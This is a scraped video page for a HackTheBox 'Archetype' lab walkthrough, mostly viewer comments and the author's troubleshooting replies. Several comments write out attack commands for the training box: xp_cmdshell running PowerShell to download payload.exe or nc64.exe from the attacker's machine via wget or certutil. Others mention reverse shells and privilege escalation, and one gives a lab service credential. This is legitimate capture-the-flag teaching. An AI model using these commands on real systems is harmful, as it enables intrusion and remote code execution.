Тёмный

Tier 2: Archetype - HackTheBox Starting Point - Full Walkthrough 

CryptoCat
Подписаться 37 тыс.
Просмотров 36 тыс.
50% 1

Опубликовано:

 

1 окт 2024

Поделиться:

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист
Посмотреть позже
Комментарии : 97   
@devonburelle400
@devonburelle400 2 года назад
This one took me forever but I learned a lot, getting those last 2 flags felt amazing!
@_CryptoCat
@_CryptoCat 2 года назад
🔥
@sunilprashanth4087
@sunilprashanth4087 2 года назад
Just now saw your playlist, it's really well explained... Keep hacking and post more videos💚✨
@_CryptoCat
@_CryptoCat 2 года назад
ty for the kind words and encouragement 🥰
@namename-qj4cu
@namename-qj4cu 4 месяца назад
Tysm.. I still can't get how this is supposed to be "very easy".
@Vladimir64Makarov
@Vladimir64Makarov 2 месяца назад
Thanks so much my bro, I had problems trying to connect.
@_CryptoCat
@_CryptoCat 2 месяца назад
np 👊
@DubThaDetailer
@DubThaDetailer Год назад
Your videos are so damn good man. I would pay for this content. Between the Practical Ethical Hacking course from TCM Security, and watching and taking notes during these videos, I have learned soo much. Thank you so much for creating such great content and doing it in a way that is approachable to people learning about this. You are an amazing resource in this community. I wish I lived overseas so I could buy you a pint!
@_CryptoCat
@_CryptoCat Год назад
Awww thanks so much mate, really appreciate the kind words! Where are you based? Maybe I'll be visiting the area some time and can give you a shout 😉
@Zephyr-tg9hu
@Zephyr-tg9hu 2 года назад
Just finished this one. I was surprised to see that the intended solution was to spawn a reverse shell! When I got access to the MS SQL server I noticed I could still run dir with the xp_cmdshell so I dir'ed my way through the whole thing 😂
@_CryptoCat
@_CryptoCat 2 года назад
haha I often do the same even for web shells.. spend a long time enumerating with brower/burp before eventually going for the shell 😆
@casualcaspero
@casualcaspero Год назад
haha same XD
@Dusty3D
@Dusty3D 3 месяца назад
I wish this video wasn't so all over the place. Starting over.
@_CryptoCat
@_CryptoCat 3 месяца назад
😥
@oramos309
@oramos309 7 месяцев назад
This is my first run through of this box. Having a hard time understanding the binary download and install, the reverse shell. I am following the walk-through PDF and nowhere does it mention meta sploit but you are using it in your video. Do you have another video where you follow the walkthrough PDFs?
@_CryptoCat
@_CryptoCat 7 месяцев назад
Hey, I don't have another video of it unfortunately.. I probably have other videos that do the same / similar, but I've lost track at this stage. The beauty of hacking is there's almost always a variety of tools/techniques you can use to achieve the same objective 😉
@sxmourai6897
@sxmourai6897 2 года назад
I use kali and I can't find winPEAS can someone help me ?
@_CryptoCat
@_CryptoCat 2 года назад
github.com/carlospolop/PEASS-ng/tree/master/winPEAS
@LMach1
@LMach1 6 месяцев назад
Following the steps to a T evil-winrm I get --- Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "{TUN0_IP}" port 5985 ({TUN0_IP}:5985) Error: Exiting with code 1 Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "{TUN0_IP}" port 5985 ({TUN0_IP}:5985) Error: Exiting with code 1 How do I get past this?
@_CryptoCat
@_CryptoCat 6 месяцев назад
Hmmm maybe try to reset the box? Are you running the command the same in the video? Does the port show open on NMap scan?
@kylejf9059
@kylejf9059 2 года назад
Many thanks. Wasn't sure how to use the SQL commands but your video was ridiculously helpful again. I knew *what* I wanted to do, just wasn't sure how! Anyway, wget wouldn't work for me using PWNBOX but "certutil -urlcache -f *IP:port*/file.exe file.exe" did. In case anyone has any problems trying to chain wget in the powershell commands. I found the password myself also but it wasn't listed same as you, it was way above I actually stopped following once I got my files uploaded as you'd helped me enough. Many thanks once again and I expect I'll be saying this again as I progress and find myself stuck 👍🏻👍🏻👍🏻
@_CryptoCat
@_CryptoCat 2 года назад
thanks mate 🙏🥰
@periyamaruthuk1785
@periyamaruthuk1785 2 года назад
Hi Mate... Hope you are doing good... You have done a real hard work to customize and categorize all the payloads... If possible... can you share the Payloads which you have categorized... it help us to explore more information by pointing to the right payloads... Hope you got my point... Thanks in Advance...😊
@_CryptoCat
@_CryptoCat 2 года назад
Thanks mate, which part of the video is it? Might just be ones I've downloaded, e.g. github.com/swisskyrepo/PayloadsAllTheThings
@byrospyro4432
@byrospyro4432 Год назад
just a heads up wget wasn't working for me on the host machine I tried with: xp_cmdshell "powershell -c cd C:\Users\Public; certutil -urlcache -f IP:PORT/payload.exe payload.exe and that was buggy as well
@hing62610
@hing62610 2 года назад
Thank you very much for the walkthrough. I have learnt so much! Please keep on doing the wonderful work. I would like to ask some noob questions: Why can't we login the administrator with mssqlclient but be able to login with psexec or evil-winrm? They are all connecting to port 1433. I cannot understand the difference. When I tried to use psexec to login sql_svc, it showed the smb files stating not writable. This confused me with smbclient.
@_CryptoCat
@_CryptoCat 2 года назад
Thank you 🙏🥰 There are some differences with the ports, e.g. mssql = 1433 psexec = 135, 445 (SMB) winrm = 5985, 5986 As for why we can't login as administrator with mssqlclient, a couple of possibilities come to mind; - depending on the config, mssql may or *may not* use windows authentication (Admin password may be different) - there could be some config options preventing admin from logging in Finally, the SMB with sql_svc.. Presumably permissions are configured to prevent that user from writing to shares.
@hing62610
@hing62610 2 года назад
@@_CryptoCat Thank you very much for the information! Given the configuration of the system is unknown, can you give a bit hints of how do you identify which tools to use in a more realistic hacking situation? Because without hints, I would try logging in with smbclient or mssqlclient but not psexec and going nowhere. Sorry for asking a very broad question.
@_CryptoCat
@_CryptoCat 2 года назад
You'll pick up things to remember as you go but when you run out things to try, just crawl the web looking for info about the ports/services you've identified. HackTricks is a good place to start (go through all the steps for each open port/service) and for windows: book.hacktricks.xyz/windows-hardening/active-directory-methodology. Look for "OSCP cheatsheets", e.g. github.com/oncybersec/oscp-enumeration-cheat-sheet, liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html etc
@walnuts312
@walnuts312 2 года назад
Just ran through this recently, and WinPeas did not return the file containing the admin password as demonstrated. The file didn't exist on the system for some reason. I had to use RoguePotato to get to the admin flag. Just a heads up in case someone hits the same wall I did
@_CryptoCat
@_CryptoCat 2 года назад
ahhh maybe was unintended solution which is now patched, thanks for the head up!
@nikolanojic6861
@nikolanojic6861 7 месяцев назад
Btw guys i couldnt upload the Payload fiel to the target , so i saw a comment and then opened the Python webserver again but with port 80 this time and this time it worked
@championchunk6623
@championchunk6623 2 года назад
What amazing waikthrough. i love the way you teach us. I want to ask you where you got all this Vulnerability payload and script, any GitHub repository? Please share!
@_CryptoCat
@_CryptoCat 2 года назад
thank you 🙏🥰 a good repo for payloads: github.com/swisskyrepo/PayloadsAllTheThings and for wordlists: github.com/danielmiessler/SecLists
@mfs6165
@mfs6165 4 месяца назад
09:15
@junaidjaved4792
@junaidjaved4792 2 года назад
Now thats alot of information thanku so much keep the good work up. 😍😍😍
@_CryptoCat
@_CryptoCat 2 года назад
thanks bro 🥰
@d1qqn121
@d1qqn121 2 года назад
Thank you for explaining the alternatives! keep it up
@_CryptoCat
@_CryptoCat 2 года назад
thanks mate 💜
@RJD_HEATSTROKE
@RJD_HEATSTROKE 2 года назад
My payload comes up as 0 bytes when I dir it using sql client. What gives?
@RJD_HEATSTROKE
@RJD_HEATSTROKE 2 года назад
I do be the trying. Been on this for a week now cause psexec nor meterpreter processes are working because the SQL terminal just seems to hang. Webup is showing the wget success code -200 but that's about as far as I'm getting into the process (winPEAS and payload.exe show length of 0 when use -c cd C:/Users/Public; dir). Can see the file, but it looks garb Not quite sure where these issues lie yet.
@_CryptoCat
@_CryptoCat 2 года назад
Hey, double check the command looks exactly the same as 23:40 - I had similar problems initially until I used the -o flag.
@MAG320
@MAG320 Год назад
I know its a year later, but I can't seem to ping the connection. I am connected using the Starting Point openVPN but it is still not working.
@_CryptoCat
@_CryptoCat Год назад
Hi mate! Firstly, check if the VPN console output hints at any issues. Also, make sure you can see your VPN IP when you run "ifconfig". If that's all good, a few things you could try: - Restart VPN - Restart VM - Regenerate VPN connection pack - Try a different box (see if it's machine specific) - Check firewall isn't blocking Otherwise, I would check the HTB forum/discord or reach out to tech support. Good luck! 🤞
@softcodeacademy
@softcodeacademy Год назад
At 8:00 Impacket comes preinstalled( or apt install impacket) so you don’t have to go through all of this Simply do impacket-mssqlclinet -S host -u user
@softcodeacademy
@softcodeacademy Год назад
Same for psexec too
@_CryptoCat
@_CryptoCat Год назад
Can you elaborate? I was using impacket's mssqlclient.py 🤔
@di_g7166
@di_g7166 Год назад
How do I get the scripts that are in 13:15
@_CryptoCat
@_CryptoCat Год назад
You can clone this repo: github.com/swisskyrepo/PayloadsAllTheThings
@aaryanbhagat4852
@aaryanbhagat4852 2 года назад
Great walkthrough.
@_CryptoCat
@_CryptoCat 2 года назад
tyty 🥰
@ВасилДиянов
@ВасилДиянов 2 года назад
Help it says "unable to connect to the remote server"
@_CryptoCat
@_CryptoCat 2 года назад
Which part? Are you connected to the VPN?
@ВасилДиянов
@ВасилДиянов 2 года назад
@@_CryptoCat yes i am connected
@ВасилДиянов
@ВасилДиянов 2 года назад
@@_CryptoCat the part where you put the payload file into the other machine
@imintheVID
@imintheVID 2 года назад
I am having the same issue
@imintheVID
@imintheVID 2 года назад
I think I have a solution... after you run the enable_xp_cmdshell did you run RECONFIGURE to install? After that I struggled to connect my http server to metasploit but released I had been using my actual IP address instead of the openVPN one I am connected to for HTB. Hope this helps. @CryptoCat Love the vids bro, makes such a nice change to an American accent :')
@julienmasse8898
@julienmasse8898 2 года назад
locate doesnt work here
@_CryptoCat
@_CryptoCat 2 года назад
sudo apt-get install mlocate
@dhruvkothari7530
@dhruvkothari7530 Год назад
Mine is giving me error - login failed for user 'ARCHETYPE\Guest' I tried so many times but nothing is happening. What should i do ?
@_CryptoCat
@_CryptoCat Год назад
I can't remember these machines too well but check out this thread on the HTB forum, maybe your answer will be in here 🙂 forum.hackthebox.com/t/starting-point-login-failed-for-user-archetype-guest/2667
@dhruvkothari7530
@dhruvkothari7530 Год назад
@@_CryptoCat thanks for the help brother!!
@jayb6736
@jayb6736 7 месяцев назад
For anyone with similar issues, I think think the solution here is you have to escape the \ character. so it should be ARCHETYPE/\sql_svc:M3g4c0rp123@{IP ADDRESS}
@chrisbaker8696
@chrisbaker8696 Год назад
Appreciate all that you do! Can you please identify how you acquired all of the scripts located at 13:17. Not "payloadsallthethings" but the items located in your "scripts" folder. Thank you!
@_CryptoCat
@_CryptoCat Год назад
Thanks! I just added some scripts to that folder as I've gone along 🙂
@chrisbaker8696
@chrisbaker8696 Год назад
@@_CryptoCat Thank you! As often stated "I don't know what I don't know". Just wanted to make sure that I wasn't missing something somewhere. Is it possible to post the contents of the scripts folder on your GitHub? I think it would be very helpful for those starting out...which I assume is the majority of your audience.
@_CryptoCat
@_CryptoCat Год назад
@@chrisbaker8696 I would.. but there's 279 directories, 2904 files 😅 Many of them were tools found in OSCP/CPTS course.
@RobbieDrake-ud4rh
@RobbieDrake-ud4rh Год назад
do you do actual write ups of these videos, Thanks
@_CryptoCat
@_CryptoCat Год назад
Not for HTB but sometimes I do write-ups to go along with videos for CTF challs: github.com/Crypto-Cat/CTF. For HTB specifically, you can check the official PDF walkthrough that comes with the starting point machines 😉
@harsherx
@harsherx Год назад
Your the best around nothing's ever gonna bring you down.
@_CryptoCat
@_CryptoCat Год назад
hehe 👨‍🎤🎸🤘
@lasersac8953
@lasersac8953 Год назад
Hey im having trouble with the wget i tried different ways to download too but i get the 200 code but after a long while on the windows server it just gives me a time out without actually downloading the file. when i dir it has 0 bytes
@_CryptoCat
@_CryptoCat Год назад
Double check steps in video / official PDF walkthrough. If that fails, check the hackthebox discord and/or forum for support 😉
@lasersac8953
@lasersac8953 Год назад
@@_CryptoCat I did noone wanted to help it was correct i ended up just not creating a reverse shell getting admin logins and connect via ssh
@_CryptoCat
@_CryptoCat Год назад
@@lasersac8953 ssh is better anyway 😉
@lasersac8953
@lasersac8953 Год назад
@@_CryptoCat Yeah it would have been nice to experience more with the reverse shell but its good to know the alternatives too
@MrAlper778
@MrAlper778 Год назад
saw what you did there at 20:55 :D
@_CryptoCat
@_CryptoCat Год назад
hehe 😎
@kdrag7560
@kdrag7560 2 года назад
Oh mister holy hackerman. What do i do when i cant transfer the payload because wget says it doesn't exist? On my listener it shows a message that the server used the get command error 404 file not found. What did i do wrong? I followed your video exacly. :(
@_CryptoCat
@_CryptoCat 2 года назад
OK so wget has successfully made a request for the payload to your local web server. If you are getting 404 file not found, probably the payload name is incorrect or you don't have the payload in the same directory that you started the python HTTP server. Check that and let me know if you don't get it 🙂
@kdrag7560
@kdrag7560 2 года назад
@@_CryptoCat That did the trick. I tested to see if the filename was wrong but i didn't know that the python server needed to be in the same directory as the file. I assumed that the thing in msfconsole was the one sending and the python server was just listening to see any error codes.
@bj76681
@bj76681 2 года назад
Hi bro, How did you get mssqlclient.py into the machine? I was not able to follow that step
@_CryptoCat
@_CryptoCat 2 года назад
you should run mssqlclient.py from your machine e.g. kali/parrot. in case you don't have the script, you can install with "python3 -m pip install impacket", more details here github.com/SecureAuthCorp/impacket
@bj76681
@bj76681 2 года назад
@@_CryptoCat Thanks Buddy. I was running ubuntu earlier. I got the point. Thanks for replying :)
@aryanpatel2188
@aryanpatel2188 2 года назад
Nice work.....good job....keep it up..... ❣️❣️
@_CryptoCat
@_CryptoCat 2 года назад
thanks mate 🥰
@Vex7eX
@Vex7eX Год назад
Excellent tutorial! Thank you!!!
@lKILLA
@lKILLA Год назад
at 28:17 I got the same error but i dont know where the meterpreter shell is located for me because I dont have your scripts folder. my scripts are all in their default folders for kali. So im not able to upload winpeasx64.exe because i dont know the directory on my local host for it. Happen to have any ideas by chance? Thank You!
@_CryptoCat
@_CryptoCat Год назад
Hi mate, you can try and search for winpeas like "locate winpeas". I don't think it comes with kali though so probably need to download: github.com/carlospolop/PEASS-ng/tree/master/winPEAS
@lKILLA
@lKILLA Год назад
@CryptoCat oh sorry. I found the path to it but the upload command with the correct path doesn't yield a directory with meterpreter. For me it's /home/kali/usr/share/winpeas/ However that gives the same error when I try the file path
@_CryptoCat
@_CryptoCat Год назад
@@lKILLA hmmm that should be right then, make sure you give the filename as well as path.
@faltadeinformacao5373
@faltadeinformacao5373 Год назад
xp_cmdshell "powershell -c cd C:/Users/Public/Downloads; wget 10.10.14.54/nc64.exe -outfile nc64.exe" error 400 file not found help I've tried everything I already put the file everywhere and it doesn't send the file to the other side, it always gives the same error omg
@_CryptoCat
@_CryptoCat Год назад
File not found sounds to me like it's not finding "nc64.exe" on your 10.10.14.54 server.. Do you have a web server running in the same directory as the nc64.exe file?
Далее
HackTheBox Walkthrough - Archetype
30:00
Просмотров 30 тыс.
When you Accidentally Compromise every CPU on Earth
15:59
Hack The Box Starting Point - Archetype walk-through
18:24